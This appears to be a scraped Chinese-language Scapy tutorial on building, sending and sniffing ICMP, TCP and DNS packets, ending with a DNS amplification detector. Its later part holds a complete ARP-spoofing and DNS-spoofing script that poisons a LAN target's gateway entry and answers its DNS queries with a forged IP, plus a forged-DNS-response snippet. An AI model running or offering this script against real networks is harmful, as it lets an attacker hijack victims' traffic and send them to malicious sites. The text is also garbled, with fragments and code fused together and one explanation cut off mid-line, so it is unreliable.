
from scapy.all import * pkt = IP(dst="8.8.8.8")/ICMP()IP(dst="8.8.8.8")定义了目标 IP 地址为 [8.8.8.8](8.8.8.8) 的 IP 层,ICMP()则表示 ICMP 协议层,通过 “/” 将两层协议叠加在一起,就构建出了一个完整的 ICMP 数据包。如果需要更复杂的数据包结构,还可以继续添加其他协议层,如在 TCP 连接建立时构造的 SYN 包:
syn_pkt = IP(dst="192.168.1.1")/TCP(dport=80, flags="S")dport=80指定了目标端口为 80,flags="S"表示设置 TCP 标志位为 SYN,用于发起 TCP 连接请求。这种高度自定义的数据包构造方式,使得 Scapy 在网络测试和实验中具有极大的灵活性。
send()和sendp()函数,我们可以分别发送三层(IP 层)和二层(以太网层)的数据包。例如,发送刚才构造的 ICMP 数据包来测试与 [8.8.8.8](8.8.8.8) 的连通性:
send(IP(dst="8.8.8.8")/ICMP())sniff()函数,它就像一个网络 “嗅探器”,能够捕获网络中的数据包。比如,我们想要捕获 10 个数据包并查看它们的摘要信息:
pkts = sniff(count=10) pkts.summary()count=10参数指定了捕获数据包的数量,summary()方法则会打印出每个数据包的简要信息,帮助我们快速了解数据包的基本情况。
http_pkts = sniff(filter="tcp port 80", count=5)filter="tcp port 80"表示只捕获 TCP 协议且目标端口为 80 的数据包,count=5则限制捕获 5 个数据包。show()方法,我们可以以一种直观的方式查看数据包的详细结构和各个字段的值。比如,对于刚才捕获的 HTTP 数据包中的第一个:
http_pkts[0].show()hexdump()方法,这在分析一些特殊的协议字段或进行数据比对时非常有用。
ans, unans = sr(IP(dst="192.168.1.0/24")/ICMP()) for snd, rcv in ans: print(f"{rcv.src} is alive")from scapy.all import * # 构造UDP数据包,目标端口为53(DNS常用端口) udp_pkt = UDP(dport=53) # 构造DNS查询部分,设置查询域名为www.baidu.com,查询类型为A记录 dns_query = DNSQR(qname="www.baidu.com", qtype="A") # 构造DNS请求数据包,设置事务ID,标志位(期望递归),问题数为1 dns_req = DNS(id=1234, qr=0, opcode=0, aa=0, tc=0, rd=1, ra=0, z=0, rcode=0, qdcount=1, ancount=0, nscount=0, arcount=0, qd=dns_query) # 将UDP数据包和DNS请求数据包组合在一起 pkt = IP(dst="8.8.8.8")/udp_pkt/dns_req # 发送数据包并接收响应 ans, unans = sr(pkt)show()方法可以查看响应数据包的详细信息:
ans[0][1].show()pip install scapysudo apt-get update sudo apt-get install python3-scapysudo apt-get update用于更新软件源列表,确保安装的是最新版本的软件包。第二条命令sudo apt-get install python3-scapy则是直接安装 Scapy 库,这里使用的是 Python3 版本的 Scapy,因为在大多数 Linux 系统中,Python3 已经成为默认的 Python 版本。brew install libdnet libpcaplibdnet提供了网络编程相关的函数,libpcap则用于数据包捕获。 4. 安装完成依赖库后,使用 pip 安装 Scapy:
pip install scapybrew update进行更新后再尝试安装依赖库。
sniff,它可以捕获流经网络接口的数据包。下面是一个简单的代码示例,展示如何捕获 DNS 数据包:
from scapy.all import * def process_packet(packet): if packet.haslayer(DNS): print(f"Source IP: {packet[IP].src} -> Destination IP: {packet[IP].dst}") print(packet[DNS].summary()) filter_str = "udp port 53" sniff(filter=filter_str, prn=process_packet, store=0)from scapy.all import *:这行代码导入了 Scapy 库中的所有模块,让我们可以使用 Scapy 提供的各种功能。def process_packet(packet)::定义了一个回调函数process_packet,这个函数会在每个捕获到的数据包上被调用。if packet.haslayer(DNS)::检查捕获到的数据包是否包含 DNS 层,如果包含,说明这是一个 DNS 数据包,我们就对其进行处理。print(f"Source IP: {packet[IP].src} -> Destination IP: {packet[IP].dst}"):打印出 DNS 数据包的源 IP 地址和目的 IP 地址,让我们知道这个数据包是从哪里来,要到哪里去。print(packet[DNS].summary()):打印出 DNS 数据包的摘要信息,包括查询的域名、查询类型等关键信息,帮助我们快速了解这个 DNS 数据包的基本情况。filter_str = "udp port 53":设置过滤条件,因为 DNS 协议通常使用 UDP 协议,端口号为 53,所以这里只捕获 UDP 端口为 53 的数据包,这样可以确保捕获到的都是 DNS 相关的数据包,避免捕获到大量无关的数据包,提高捕获效率。sniff(filter=filter_str, prn=process_packet, store=0):sniff函数是 Scapy 中用于捕获数据包的核心函数。filter=filter_str参数指定了过滤条件,只捕获符合条件的数据包;prn=process_packet参数指定了每个捕获到的数据包要调用的回调函数,即process_packet函数;store=0表示不存储捕获到的数据包,这样可以节省内存,因为如果持续捕获大量数据包并存储,会占用大量的内存空间,而我们在很多情况下只需要实时处理数据包,不需要保存它们。process_packet函数进行扩展,使其能够提取更多的 DNS 数据包信息:
from scapy.all import * def process_packet(packet): if packet.haslayer(DNS): ip = packet.getlayer(IP) transport = packet.getlayer(UDP) or packet.getlayer(TCP) print(f"Source: {ip.src}:{transport.sport} -> Destination: {ip.dst}:{transport.dport}") dns = packet.getlayer(DNS) if dns.qr == 0: print("DNS Query:") for q in dns.qd: print(f" Query: {q.qname.decode()} (Type: {q.qtype}, Class: {q.qclass})") else: print("DNS Response:") for i in range(dns.ancount): ans = dns.an[i] if ans.type == 1: print(f" Answer: {ans.rrname.decode()} -> {ans.rdata} (Type: A, TTL: {ans.ttl})") filter_str = "udp port 53" sniff(filter=filter_str, prn=process_packet, store=0)ip = packet.getlayer(IP)和transport = packet.getlayer(UDP) or packet.getlayer(TCP):获取数据包的 IP 层和传输层(UDP 或 TCP,因为 DNS 可以通过这两种协议传输),以便获取源 IP 地址、源端口、目的 IP 地址和目的端口信息,并打印出来。if dns.qr == 0::判断 DNS 数据包是查询请求还是响应。qr字段是 DNS 首部中的一个标志位,当qr为 0 时,表示这是一个查询请求;当qr为 1 时,表示这是一个响应。dns.qr == 0):
for q in dns.qd:循环遍历 DNS 查询部分(dns.qd),提取出每个查询的域名(q.qname.decode())、查询类型(q.qtype)和查询类(q.qclass)并打印。这里使用decode()方法将字节形式的域名转换为字符串形式,方便我们阅读。dns.qr == 1):
for i in range(dns.ancount):循环遍历 DNS 回答部分(dns.an),dns.ancount表示回答部分的资源记录数。ans = dns.an[i]获取每个回答记录。if ans.type == 1:判断记录类型是否为 A 记录(类型值为 1),如果是 A 记录,打印出域名(ans.rrname.decode())、对应的 IP 地址(ans.rdata)、记录类型(Type: A)和生存时间(TTL: {ans.ttl})。A 记录是将域名映射到 IPv4 地址的记录,在我们访问网站时,通过 A 记录可以找到网站服务器的 IP 地址。from scapy.all import * # 构造UDP数据包,目标端口为53(DNS常用端口) udp_pkt = UDP(dport=53) # 构造DNS查询部分,设置查询域名为www.example.com,查询类型为A记录 dns_query = DNSQR(qname="www.example.com", qtype="A") # 构造DNS请求数据包,设置事务ID,标志位(期望递归),问题数为1 dns_req = DNS(id=1234, qr=0, opcode=0, aa=0, tc=0, rd=1, ra=0, z=0, rcode=0, qdcount=1, ancount=0, nscount=0, arcount=0, qd=dns_query) # 将UDP数据包和DNS请求数据包组合在一起 pkt = IP(dst="8.8.8.8")/udp_pkt/dns_req # 发送数据包并接收响应 ans, unans = sr(pkt)udp_pkt = UDP(dport=53):构造一个 UDP 数据包,指定目标端口为 53,这是 DNS 协议常用的端口。dns_query = DNSQR(qname="www.example.com", qtype="A"):构造 DNS 查询部分,设置查询域名为www.example.com,查询类型为 A 记录,即查询该域名对应的 IPv4 地址。dns_req = DNS(id=1234, qr=0, opcode=0, aa=0, tc=0, rd=1, ra=0, z=0, rcode=0, qdcount=1, ancount=0, nscount=0, arcount=0, qd=dns_query):构造完整的 DNS 请求数据包。
id=1234设置事务 ID,这是一个随机生成的值,用于匹配请求和响应,这里我们设置为 1234。qr=0表示这是一个查询请求。opcode=0表示标准查询。aa=0表示不是权威应答。tc=0表示数据包未被截断。rd=1表示期望递归查询,即希望 DNS 服务器代替我们去寻找最终的答案。ra=0表示不关心服务器是否支持递归查询。z=0是保留字段,必须为 0。rcode=0表示没有错误。qdcount=1表示问题部分有 1 条记录,即我们刚才构造的dns_query。ancount=0、nscount=0和arcount=0分别表示回答部分、授权部分和附加部分的记录数,在查询请求中,这些部分通常为空,所以都设置为 0。pkt = IP(dst="8.8.8.8")/udp_pkt/dns_req:将 IP 数据包、UDP 数据包和 DNS 请求数据包组合在一起,形成一个完整的网络数据包,指定目标 IP 地址为8.8.8.8,这是 Google 的公共 DNS 服务器地址。ans, unans = sr(pkt):使用sr函数发送数据包并接收响应。sr函数会返回两个值,ans是接收到响应的数据包对(请求和响应),unans是没有收到响应的数据包。from scapy.all import * # 构造UDP数据包,目标端口为53(DNS常用端口) udp_pkt = UDP(dport=53) # 构造DNS查询部分,设置查询域名为www.newdomain.com,查询类型为A记录 dns_query = DNSQR(qname="www.newdomain.com", qtype="A") # 构造DNS请求数据包,设置事务ID,标志位(期望递归),问题数为1 dns_req = DNS(id=1234, qr=0, opcode=0, aa=0, tc=0, rd=1, ra=0, z=0, rcode=0, qdcount=1, ancount=0, nscount=0, arcount=0, qd=dns_query) # 将UDP数据包和DNS请求数据包组合在一起 pkt = IP(dst="8.8.8.8")/udp_pkt/dns_req # 发送数据包并接收响应 ans, unans = sr(pkt)dns_query = DNSQR(qname="www.example.com", qtype="A")中的qname改为我们想要查询的新域名www.newdomain.com,就完成了查询域名的修改。from scapy.all import * # 构造UDP数据包,目标端口为53(DNS常用端口) udp_pkt = UDP(dport=53) # 构造DNS查询部分,设置查询域名为www.example.com,查询类型为A记录 dns_query = DNSQR(qname="www.example.com", qtype="A") # 构造DNS请求数据包,设置事务ID,标志位(期望递归),问题数为1 dns_req = DNS(id=1234, qr=0, opcode=0, aa=0, tc=0, rd=1, ra=0, z=0, rcode=0, qdcount=1, ancount=0, nscount=0, arcount=0, qd=dns_query) # 将UDP数据包和DNS请求数据包组合在一起 pkt = IP(dst="8.8.8.8")/udp_pkt/dns_req # 发送数据包并接收响应 ans, unans = sr(pkt) if ans: response = ans[0][1] original_dns = response.getlayer(DNS) modified_dns = DNS(id=original_dns.id, qr=1, opcode=0, aa=1, tc=0, rd=1, ra=1, z=0, rcode=0, qdcount=original_dns.qdcount, ancount=1, nscount=0, arcount=0, qd=original_dns.qd, an=DNSRR(rrname=original_dns.qd.qname, type="A", ttl=300, rdata="192.168.1.1")) spoofed_response = IP(dst=response[IP].src, src=response[IP].dst) / \ UDP(dport=response[UDP].sport, sport=response[UDP].dport) / \ modified_dns send(spoofed_response)if ans:判断是否接收到响应。response = ans[0][1]获取响应数据包。original_dns = response.getlayer(DNS)获取响应数据包中的 DNS 层。modified_dns中:
id=original_dns.id保持事务 ID 不变,以便与原始请求匹配。qr=1表示这是一个响应。aa=1表示是权威应答。ancount=1表示回答部分有 1 条记录。an=DNSRR(rrname=original_dns.qd.qname, type="A", ttl=300, rdata="192.168.1.1")设置回答部分的记录,rrname为原始查询的域名,type="A"表示 A 记录,ttl=300设置生存时间为 300 秒,`rdata="192.16from scapy.all import * import threading # 全局变量,用于存储目标IP和伪造的IP target_ip = "192.168.1.100" spoofed_ip = "10.0.0.1" gateway_ip = "192.168.1.1" # ARP欺骗函数,使目标主机将攻击者视为网关 def arp_spoof(): target_mac = getmacbyip(target_ip) while True: arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=gateway_ip, hwsrc=get_if_hwaddr(conf.iface)) send(arp_response, verbose=0) time.sleep(2) # DNS欺骗函数,当捕获到目标设备发送的DNS请求时,修改应答数据指向黑客指定的IP地址 def dns_spoof(packet): if packet.haslayer(DNSQR) and packet[IP].dst == target_ip: qname = packet[DNSQR].qname dns_response = IP(dst=packet[IP].src, src=packet[IP].dst) / \ UDP(dport=packet[UDP].sport, sport=53) / \ DNS(id=packet[DNS].id, qr=1, aa=1, rcode=0, qd=packet[DNS].qd, an=DNSRR(rrname=qname, rdata=spoofed_ip)) send(dns_response, verbose=0) # 启动ARP欺骗线程 arp_thread = threading.Thread(target=arp_spoof) arp_thread.start() # 嗅探DNS数据包并进行DNS欺骗 sniff(filter=f"udp port 53 and host {target_ip}", prn=dns_spoof, store=0)target_ip和spoofed_ip分别定义了目标主机的 IP 地址和攻击者希望目标主机解析到的伪造 IP 地址,gateway_ip是网关的 IP 地址。arp_spoof函数实现了 ARP 欺骗。getmacbyip(target_ip)获取目标主机的 MAC 地址,然后通过循环发送伪造的 ARP 响应包,使目标主机将攻击者的 IP 地址误认为是网关的 IP 地址。ARP(pdst=target_ip, hwdst=target_mac, psrc=gateway_ip, hwsrc=get_if_hwaddr(conf.iface))构造了一个 ARP 响应包,其中pdst是目标 IP 地址,hwdst是目标 MAC 地址,psrc是源 IP 地址(设置为网关 IP 地址),hwsrc是源 MAC 地址(设置为攻击者的 MAC 地址)。send(arp_response, verbose=0)将构造好的 ARP 响应包发送出去,verbose=0表示不显示详细的发送信息。time.sleep(2)使程序每隔 2 秒发送一次 ARP 响应包,因为 ARP 缓存会刷新,需要定期发送以保持欺骗效果。dns_spoof函数实现了 DNS 欺骗。if packet.haslayer(DNSQR) and packet[IP].dst == target_ip:判断捕获到的数据包是否是目标主机发送的 DNS 查询请求。如果是,获取查询的域名qname = packet[DNSQR].qname。然后构造 DNS 响应数据包dns_response,其中IP(dst=packet[IP].src, src=packet[IP].dst)设置响应的 IP 层,将目标 IP 地址和源 IP 地址互换;UDP(dport=packet[UDP].sport, sport=53)设置 UDP 层,将目标端口和源端口互换,源端口设置为 53(DNS 服务器常用端口);DNS(id=packet[DNS].id, qr=1, aa=1, rcode=0, qd=packet[DNS].qd, an=DNSRR(rrname=qname, rdata=spoofed_ip))设置 DNS 层,id=packet[DNS].id保持事务 ID 不变,以便与原始请求匹配,qr=1表示这是一个响应,aa=1表示是权威应答,rcode=0表示没有错误,qd=packet[DNS].qd保持查询部分不变,an=DNSRR(rrname=qname, rdata=spoofed_ip)设置回答部分,将查询的域名指向伪造的 IP 地址。最后,使用send(dns_response, verbose=0)将伪造的 DNS 响应包发送给目标主机。arp_thread = threading.Thread(target=arp_spoof)创建一个线程来执行 ARP 欺骗函数,arp_thread.start()启动这个线程。sniff(filter=f"udp port 53 and host {target_ip}", prn=dns_spoof, store=0)开始嗅探网络中的数据包,只捕获 UDP 端口为 53 且目标主机为target_ip的数据包,对于每个捕获到的数据包,调用dns_spoof函数进行处理,store=0表示不存储捕获到的数据包。spoofed_ip,导致用户访问到恶意网站,可能会面临信息泄露、恶意软件感染等风险。from scapy.all import * import time # 存储每个源IP的DNS请求计数和响应计数 request_counts = {} response_counts = {} # 检测阈值,单位为秒 detection_threshold = 10 # 流量放大倍数阈值 amplification_threshold = 5 # 处理捕获到的DNS数据包 def process_dns_packet(packet): global request_counts, response_counts if packet.haslayer(DNS): ip = packet.getlayer(IP) if packet[DNS].qr == 0: # DNS查询请求 source_ip = ip.src if source_ip not in request_counts: request_counts[source_ip] = {'count': 0,'start_time': time.time()} request_counts[source_ip]['count'] += 1 else: # DNS响应 source_ip = ip.src if source_ip not in response_counts: response_counts[source_ip] = {'count': 0,'start_time': time.time()} response_counts[source_ip]['count'] += 1 # 定期检查是否存在DNS放大攻击 def check_for_amplification(): global request_counts, response_counts while True: current_time = time.time() for source_ip in list(request_counts.keys()): if current_time - request_counts[source_ip]['start_time'] > detection_threshold: del request_counts[source_ip] for source_ip in list(response_counts.keys()): if current_time - response_counts[source_ip]['start_time'] > detection_threshold: del response_counts[source_ip] for source_ip in request_counts.keys(): if source_ip in response_counts: request_count = request_counts[source_ip]['count'] response_count = response_counts[source_ip]['count'] amplification_ratio = response_count / request_count if request_count > 0 else 0 if amplification_ratio > amplification_threshold: print(f"可能存在DNS放大攻击,源IP: {source_ip},请求计数: {request_count},响应计数: {response_count},放大倍数: {amplification_ratio}") time.sleep(detection_threshold) # 启动嗅探线程 sniff_thread = threading.Thread(target=sniff, kwargs={'filter': 'udp port 53', 'prn': process_dns_packet,'store': 0}) sniff_thread.start() # 启动检测线程 check_thread = threading.Thread(target=check_for_amplification) check_thread.start()request_counts和response_counts是两个全局字典,用于分别存储每个源 IP 的 DNS 请求计数和响应计数,以及首次出现的时间。detection_threshold定义了检测的时间阈值,单位为秒。在这个时间范围内,如果某个源 IP 的 DNS 请求和响应计数超过一定比例,就可能被判定为存在 DNS 放大攻击。amplification_threshold定义了流量放大倍数的阈值。当某个源 IP 的 DNS 响应计数与请求计数的比值超过这个阈值时,就会触发攻击警报。process_dns_packet函数用于处理捕获到的每个 DNS 数据包。if packet.haslayer(DNS):判断数据包是否包含 DNS 层,如果包含,则获取 IP 层ip = packet.getlayer(IP)。if packet[DNS].qr == 0:判断是否为 DNS 查询请求,如果是,获取源 IP 地址source_ip = ip.src,如果该源 IP 地址不在request_counts字典中,则初始化其计数和开始时间request_counts[source_ip] = {'count': 0,'start_time': time.time()},然后将请求计数加 1request_counts[source_ip]['count'] += 1。如果是 DNS 响应else:,同样获取源 IP 地址,进行类似的初始化和计数增加操作,将响应计数记录在response_counts字典中。check_for_amplification函数用于定期检查是否存在 DNS 放大攻击。通过一个无限循环while True:,每隔detection_threshold秒执行一次检查。首先获取当前时间current_time = time.time(),然后遍历request_counts和response_counts字典,删除那些首次出现时间超过detection_threshold秒的源 IP 记录,以确保字典中的数据是在有效检测时间范围内的。接着,对于每个在request_counts中的源 IP,如果它也在response_counts中,计算其请求计数request_count = request_counts[source_ip]['count']和响应计数response_count = response_counts[source_ip]['count'],并计算放大倍数amplification_ratio = response_count / request_count if request_count > 0 else 0。如果放大倍数超过amplification_threshold阈值,则打印出可能存在 DNS 放大攻击的警报信息,包括源 IP 地址、请求计数、响应计数和放大倍数。sniff_thread = threading.Thread(target=sniff, kwargs={'filter': 'udp port 53', 'prn': process_dns_packet,'store': 0})创建一个线程来嗅探网络中的 UDP 端口为 53(DNS 常用端口)的数据包,并将每个捕获到的数据包传递给process_dns_packet函数进行处理,store=0表示不存储捕获到的数据包。sniff_thread.start()启动这个嗅探线程。check_thread = threading.Thread(target=check_for_amplification)创建一个线程来执行check_for_amplification函数,定期检查是否存在 DNS 放大攻击。check_thread.start()启动这个检测线程。sudo命令来获取管理员权限。例如,当你在终端中运行 Scapy 脚本时,在命令前加上sudo,如sudo python3 my_scapy_script.py,这样系统会提示你输入管理员密码,输入正确后即可以管理员身份运行脚本。在使用sudo时,要确保你对执行的命令有充分的了解,因为管理员权限具有较高的操作权限,不当的操作可能会对系统造成损害。sudo。但需要注意的是,在 macOS 中,一些系统保护机制可能会限制 Scapy 的某些操作。如果遇到权限相关的问题,除了使用sudo外,还需要检查系统的安全性与隐私设置,确保允许相关的网络操作。filter=f"udp port 53 and host {target_domain}",其中target_domain是你关注的域名。这样可以避免捕获大量无关的数据包,减少数据处理的工作量,让你更专注于目标数据包的分析。另外,还可以根据数据包的其他特征进行过滤,如根据源 IP 地址或目的 IP 地址过滤,filter=f"udp port 53 and src {source_ip}"表示只捕获源 IP 地址为source_ip且 UDP 端口为 53(DNS 常用端口)的数据包。
-->